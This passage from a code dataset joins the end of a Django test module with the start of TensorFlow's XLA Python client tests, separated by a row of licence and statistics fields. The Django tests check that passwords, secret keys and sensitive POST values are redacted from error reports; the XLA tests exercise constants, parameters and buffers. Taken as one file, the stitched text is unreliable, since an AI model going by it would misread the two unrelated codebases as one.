request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', '[email protected]')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
Everything (request info and frame variables) can bee seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
No POST parameters and frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
error reports for if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
Callable settings which forbid to set attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
Here we specifically test the plain text 500 debug-only error page served
when it has been detected the request was sent by JS code. We don't check
for (non)existence of frames vars in the traceback information section of
the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
Request info can bee seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
| bsd-3-clause | -7,065,527,192,650,510,000 | 41.75 | 117 | 0.616501 | false |
xodus7/tensorflow | tensorflow/compiler/xla/python/xla_client_test.py | 6 | 57359 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.Execute(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments,
expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertTrue(len(proto.computations) == 1)
self.assertTrue(len(proto.computations[0].instructions) == 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.ExecuteWithLocalBuffers([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().Execute()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().Execute()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
